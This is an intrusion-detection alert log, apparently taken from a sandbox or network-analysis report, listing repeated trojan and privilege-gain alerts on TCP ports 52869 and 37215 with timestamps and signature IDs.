                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:07:03.257276
                      SID:2027339
                      Source Port:45526
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:06:09.635095
                      SID:2025132
                      Source Port:39724
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted User Privilege Gain
                      Timestamp:07/20/24-23:05:38.949221
                      SID:2829579
                      Source Port:46246
                      Destination Port:37215
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:06:01.219796
                      SID:2027339
                      Source Port:60276
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:06:15.553063
                      SID:2831300
                      Source Port:51278
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted Administrator Privilege Gain
                      Timestamp:07/20/24-23:05:56.310476
                      SID:2829579
                      Source Port:46252
                      Destination Port:37215
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:05:40.326250
                      SID:2027339
                      Source Port:49348
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:05:36.339999
                      SID:2829579
                      Source Port:54780
                      Destination Port:37215
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:05:40.478948
                      SID:2831300
                      Source Port:42368
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted Administrator Privilege Gain
                      Timestamp:07/20/24-23:06:02.997058
                      SID:2027339
                      Source Port:57668
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:05:52.508651
                      SID:2027339
                      Source Port:50842
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:05:56.137269
                      SID:2829579
                      Source Port:52238
                      Destination Port:37215
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:05:59.348370
                      SID:2027339
                      Source Port:50298
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:05:36.327720
                      SID:2829579
                      Source Port:44436
                      Destination Port:37215
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:05:52.692606
                      SID:2027339
                      Source Port:46080
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:06:15.063003
                      SID:2027339
                      Source Port:37240
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:05:42.127943
                      SID:2829579
                      Source Port:48546
                      Destination Port:37215
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:05:57.549014
                      SID:2025132
                      Source Port:59894
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted User Privilege Gain
                      Timestamp:07/20/24-23:05:39.615596
                      SID:2025132
                      Source Port:47056
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted User Privilege Gain
                      Timestamp:07/20/24-23:05:52.575727
                      SID:2027339
                      Source Port:57388
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:06:00.005301
                      SID:2027339
                      Source Port:49798
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:05:42.131789
                      SID:2829579
                      Source Port:44530
                      Destination Port:37215
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:06:11.296188
                      SID:2025132
                      Source Port:59228
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted User Privilege Gain
                      Timestamp:07/20/24-23:05:33.830838
                      SID:2835222
                      Source Port:49388
                      Destination Port:37215
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:06:13.770520
                      SID:2027339
                      Source Port:39322
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:05:38.765315
                      SID:2025132
                      Source Port:41026
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted User Privilege Gain
                      Timestamp:07/20/24-23:05:45.094611
                      SID:2027339
                      Source Port:40510
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:05:58.794030
                      SID:2027339
                      Source Port:33180
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:06:22.218849
                      SID:2831300
                      Source Port:53418
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted Administrator Privilege Gain
                      Timestamp:07/20/24-23:05:46.515260
                      SID:2027339
                      Source Port:54976
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:06:05.846150
                      SID:2831300
                      Source Port:54866
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted Administrator Privilege Gain
                      Timestamp:07/20/24-23:05:37.468948
                      SID:2027339
                      Source Port:35732
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:05:56.900733
                      SID:2027339
                      Source Port:36170
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:07:36.617416
                      SID:2027339
                      Source Port:49058
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:05:34.661756
                      SID:2829579
                      Source Port:43344
                      Destination Port:37215
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:05:48.756259
                      SID:2835222
                      Source Port:49548
                      Destination Port:37215
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:06:06.855214
                      SID:2027339
                      Source Port:34010
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:06:50.982145
                      SID:2025132
                      Source Port:35422
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted User Privilege Gain
                      Timestamp:07/20/24-23:05:39.055909
                      SID:2835222
                      Source Port:45640
                      Destination Port:37215
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:05:40.455250
                      SID:2831300
                      Source Port:48822
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted Administrator Privilege Gain
                      Timestamp:07/20/24-23:06:03.945487
                      SID:2835222
                      Source Port:59072
                      Destination Port:37215
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:05:37.517011
                      SID:2831300
                      Source Port:57116
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted Administrator Privilege Gain
                      Timestamp:07/20/24-23:05:58.950772
                      SID:2025132
                      Source Port:33016
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted User Privilege Gain
                      Timestamp:07/20/24-23:06:06.638799
                      SID:2027339
                      Source Port:54558
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:06:02.949715
                      SID:2025132
                      Source Port:45152
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted User Privilege Gain
                      Timestamp:07/20/24-23:06:13.684507
                      SID:2025132
                      Source Port:44864
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted User Privilege Gain
                      Timestamp:07/20/24-23:06:25.686672
                      SID:2831300
                      Source Port:45832
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted Administrator Privilege Gain
                      Timestamp:07/20/24-23:05:37.442743
                      SID:2831300
                      Source Port:53022
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted Administrator Privilege Gain
                      Timestamp:07/20/24-23:06:01.285913
                      SID:2025132
                      Source Port:49488
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted User Privilege Gain
                      Timestamp:07/20/24-23:05:34.619289
                      SID:2829579
                      Source Port:36848
                      Destination Port:37215
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:05:57.204945
                      SID:2025132
                      Source Port:35048
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted User Privilege Gain
                      Timestamp:07/20/24-23:05:58.880153
                      SID:2831300
                      Source Port:40082
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted Administrator Privilege Gain
                      Timestamp:07/20/24-23:05:58.417625
                      SID:2027339
                      Source Port:52436
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:05:56.998513
                      SID:2025132
                      Source Port:59496
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted User Privilege Gain
                      Timestamp:07/20/24-23:05:57.963204
                      SID:2025132
                      Source Port:57832
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted User Privilege Gain
                      Timestamp:07/20/24-23:05:58.929504
                      SID:2027339
                      Source Port:34352
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:05:33.852857
                      SID:2835222
                      Source Port:35626
                      Destination Port:37215
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:06:15.553063
                      SID:2025132
                      Source Port:58570
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted User Privilege Gain
                      Timestamp:07/20/24-23:05:59.787018
                      SID:2027339
                      Source Port:50792
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:06:00.257590
                      SID:2831300
                      Source Port:57650
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted Administrator Privilege Gain
                      Timestamp:07/20/24-23:05:38.949221
                      SID:2835222
                      Source Port:37406
                      Destination Port:37215
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:05:52.514709
                      SID:2027339
                      Source Port:58868
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:05:56.048573
                      SID:2835222
                      Source Port:43692
                      Destination Port:37215
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:06:02.018794
                      SID:2027339
                      Source Port:42064
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:05:38.530661
                      SID:2027339
                      Source Port:58316
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:06:01.411873
                      SID:2027339
                      Source Port:60948
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:06:01.940214
                      SID:2027339
                      Source Port:51898
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:06:12.620447
                      SID:2025132
                      Source Port:53290
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted User Privilege Gain
                      Timestamp:07/20/24-23:05:40.407056
                      SID:2831300
                      Source Port:45708
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted Administrator Privilege Gain
                      Timestamp:07/20/24-23:05:56.894939
                      SID:2027339
                      Source Port:55704
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:05:39.537505
                      SID:2027339
                      Source Port:42258
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:05:33.857328
                      SID:2829579
                      Source Port:55246
                      Destination Port:37215
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:05:48.756259
                      SID:2835222
                      Source Port:48908
                      Destination Port:37215
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:05:42.257476
                      SID:2829579
                      Source Port:47182
                      Destination Port:37215
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:06:13.097390
                      SID:2027339
                      Source Port:54420
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:06:17.555463
                      SID:2027339
                      Source Port:48792
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:05:45.386529
                      SID:2829579
                      Source Port:44926
                      Destination Port:37215
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:06:15.208037
                      SID:2025132
                      Source Port:53788
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted User Privilege Gain
                      Timestamp:07/20/24-23:05:52.493809
                      SID:2831300
                      Source Port:33020
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted Administrator Privilege Gain
                      Timestamp:07/20/24-23:05:52.546679
                      SID:2027339
                      Source Port:49504
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:06:00.954677
                      SID:2025132
                      Source Port:35922
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted User Privilege Gain
                      Timestamp:07/20/24-23:05:39.578201
                      SID:2027339
                      Source Port:48650
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:05:35.248418
                      SID:2025132
                      Source Port:53676
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted User Privilege Gain
                      Timestamp:07/20/24-23:05:48.773442
                      SID:2835222
                      Source Port:53258
                      Destination Port:37215
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:05:59.247850
                      SID:2027339
                      Source Port:60622
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:05:37.449834
                      SID:2831300
                      Source Port:58082
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted Administrator Privilege Gain
                      Timestamp:07/20/24-23:06:16.584797
                      SID:2025132
                      Source Port:35520
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted User Privilege Gain
                      Timestamp:07/20/24-23:05:40.330643
                      SID:2831300
                      Source Port:48264
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted Administrator Privilege Gain
                      Timestamp:07/20/24-23:05:56.402098
                      SID:2829579
                      Source Port:55778
                      Destination Port:37215
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:05:33.830272
                      SID:2829579
                      Source Port:35948
                      Destination Port:37215
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:05:36.528872
                      SID:2829579
                      Source Port:33484
                      Destination Port:37215
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:05:38.939890
                      SID:2835222
                      Source Port:33920
                      Destination Port:37215
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:06:03.476247
                      SID:2835222
                      Source Port:60504
                      Destination Port:37215
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:06:54.322182
                      SID:2027339
                      Source Port:53984
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:05:57.544145
                      SID:2831300
                      Source Port:58286
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted Administrator Privilege Gain
                      Timestamp:07/20/24-23:05:59.080968
                      SID:2831300
                      Source Port:39288
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted Administrator Privilege Gain
                      Timestamp:07/20/24-23:07:01.742070
                      SID:2027339
                      Source Port:52032
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:05:57.558741
                      SID:2027339
                      Source Port:41890
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:06:51.995876
                      SID:2831300
                      Source Port:54570
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted Administrator Privilege Gain
                      Timestamp:07/20/24-23:06:07.030071
                      SID:2027339
                      Source Port:53492
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:06:11.469684
                      SID:2831300
                      Source Port:39280
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted Administrator Privilege Gain
                      Timestamp:07/20/24-23:06:00.078168
                      SID:2027339
                      Source Port:43772
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:06:03.345104
                      SID:2027339
                      Source Port:50916
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:05:59.954496
                      SID:2025132
                      Source Port:45420
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted User Privilege Gain
                      Timestamp:07/20/24-23:05:42.245589
                      SID:2829579
                      Source Port:44872
                      Destination Port:37215
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:06:35.070304
                      SID:2831300
                      Source Port:43896
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted Administrator Privilege Gain
                      Timestamp:07/20/24-23:06:00.536999
                      SID:2027339
                      Source Port:33872
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:05:35.479241
                      SID:2025132
                      Source Port:59484
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted User Privilege Gain
                      Timestamp:07/20/24-23:05:45.403074
                      SID:2835222
                      Source Port:45610
                      Destination Port:37215
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:05:57.037609
                      SID:2025132
                      Source Port:58644
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted User Privilege Gain
                      Timestamp:07/20/24-23:06:00.022949
                      SID:2027339
                      Source Port:58656
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:05:42.245742
                      SID:2829579
                      Source Port:38026
                      Destination Port:37215
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:06:01.949518
                      SID:2027339
                      Source Port:39564
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:07:06.736138
                      SID:2829579
                      Source Port:37378
                      Destination Port:37215
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:05:38.956391
                      SID:2835222
                      Source Port:41846
                      Destination Port:37215
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:06:17.661736
                      SID:2025132
                      Source Port:55822
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted User Privilege Gain
                      Timestamp:07/20/24-23:05:34.657263
                      SID:2835222
                      Source Port:53120
                      Destination Port:37215
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:05:50.528919
                      SID:2829579
                      Source Port:60378
                      Destination Port:37215
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:05:40.465472
                      SID:2027339
                      Source Port:55164
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:05:40.439699
                      SID:2027339
                      Source Port:55330
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:05:57.457796
                      SID:2027339
                      Source Port:45750
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:05:50.555898
                      SID:2829579
                      Source Port:35654
                      Destination Port:37215
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:05:36.339999
                      SID:2829579
                      Source Port:42890
                      Destination Port:37215
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:05:36.343227
                      SID:2829579
                      Source Port:49816
                      Destination Port:37215
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:06:29.727366
                      SID:2025132
                      Source Port:50370
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted User Privilege Gain
                      Timestamp:07/20/24-23:05:57.137886
                      SID:2027339
                      Source Port:58842
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:06:01.893151
                      SID:2027339
                      Source Port:32798
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:06:02.577230
                      SID:2027339
                      Source Port:41956
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:05:57.139895
                      SID:2027339
                      Source Port:33104
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:05:58.662427
                      SID:2025132
                      Source Port:39980
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted User Privilege Gain
                      Timestamp:07/20/24-23:05:57.934535
                      SID:2027339
                      Source Port:49924
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:06:14.442724
                      SID:2025132
                      Source Port:48080
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted User Privilege Gain
                      Timestamp:07/20/24-23:06:21.746493
                      SID:2027339
                      Source Port:37748
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:06:23.413340
                      SID:2025132
                      Source Port:35932
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted User Privilege Gain
                      Timestamp:07/20/24-23:05:56.038244
                      SID:2835222
                      Source Port:49020
                      Destination Port:37215
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:05:37.442743
                      SID:2027339
                      Source Port:35332
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:05:39.647017
                      SID:2025132
                      Source Port:38378
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted User Privilege Gain
                      Timestamp:07/20/24-23:06:44.665919
                      SID:2831300
                      Source Port:59134
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted Administrator Privilege Gain
                      Timestamp:07/20/24-23:05:38.939890
                      SID:2829579
                      Source Port:59048
                      Destination Port:37215
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:06:01.433779
                      SID:2831300
                      Source Port:54018
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted Administrator Privilege Gain
                      Timestamp:07/20/24-23:06:08.195958
                      SID:2027339
                      Source Port:49462
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:05:35.835422
                      SID:2027339
                      Source Port:43314
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:05:59.714236
                      SID:2027339
                      Source Port:43432
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:05:38.743174
                      SID:2025132
                      Source Port:34904
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted User Privilege Gain
                      Timestamp:07/20/24-23:05:39.777436
                      SID:2829579
                      Source Port:46486
                      Destination Port:37215
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:06:05.879269
                      SID:2831300
                      Source Port:50494
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted Administrator Privilege Gain
                      Timestamp:07/20/24-23:05:57.816478
                      SID:2027339
                      Source Port:54330
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:05:40.365777
                      SID:2831300
                      Source Port:45970
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted Administrator Privilege Gain
                      Timestamp:07/20/24-23:06:36.110698
                      SID:2831300
                      Source Port:53470
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted Administrator Privilege Gain
                      Timestamp:07/20/24-23:05:59.133147
                      SID:2027339
                      Source Port:40900
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:05:40.365973
                      SID:2831300
                      Source Port:35928
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted Administrator Privilege Gain
                      Timestamp:07/20/24-23:05:36.433724
                      SID:2025132
                      Source Port:56500
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted User Privilege Gain
                      Timestamp:07/20/24-23:05:39.067591
                      SID:2829579
                      Source Port:51554
                      Destination Port:37215
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:06:16.332122
                      SID:2831300
                      Source Port:51658
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted Administrator Privilege Gain
                      Timestamp:07/20/24-23:05:52.515826
                      SID:2027339
                      Source Port:52628
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:06:39.471724
                      SID:2025132
                      Source Port:40540
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted User Privilege Gain
                      Timestamp:07/20/24-23:05:33.853184
                      SID:2829579
                      Source Port:55242
                      Destination Port:37215
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:05:58.403603
                      SID:2025132
                      Source Port:45274
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted User Privilege Gain
                      Timestamp:07/20/24-23:05:35.952301
                      SID:2027339
                      Source Port:55178
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:05:48.841499
                      SID:2835222
                      Source Port:53096
                      Destination Port:37215
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:05:57.887085
                      SID:2831300
                      Source Port:32890
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted Administrator Privilege Gain
                      Timestamp:07/20/24-23:06:03.784686
                      SID:2027339
                      Source Port:43814
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:06:15.818526
                      SID:2027339
                      Source Port:52950
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:06:30.636367
                      SID:2831300
                      Source Port:35672
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted Administrator Privilege Gain
                      Timestamp:07/20/24-23:05:35.771029
                      SID:2025132
                      Source Port:43110
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted User Privilege Gain
                      Timestamp:07/20/24-23:06:06.184196
                      SID:2027339
                      Source Port:43866
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:05:48.808887
                      SID:2829579
                      Source Port:36400
                      Destination Port:37215
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:05:56.997704
                      SID:2027339
                      Source Port:37082
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:05:48.821008
                      SID:2835222
                      Source Port:57520
                      Destination Port:37215
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:06:19.575886
                      SID:2027339
                      Source Port:54172
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:05:52.503773
                      SID:2027339
                      Source Port:45314
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:06:06.546922
                      SID:2025132
                      Source Port:55148
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted User Privilege Gain
                      Timestamp:07/20/24-23:05:48.777005
                      SID:2829579
                      Source Port:34978
                      Destination Port:37215
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:06:00.191114
                      SID:2027339
                      Source Port:39098
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:06:09.682183
                      SID:2027339
                      Source Port:58848
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:05:57.141104
                      SID:2831300
                      Source Port:60572
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted Administrator Privilege Gain
                      Timestamp:07/20/24-23:05:59.417612
                      SID:2027339
                      Source Port:56742
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:05:37.472951
                      SID:2831300
                      Source Port:42690
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted Administrator Privilege Gain
                      Timestamp:07/20/24-23:05:56.121210
                      SID:2835222
                      Source Port:57422
                      Destination Port:37215
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:06:03.378832
                      SID:2829579
                      Source Port:33772
                      Destination Port:37215
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
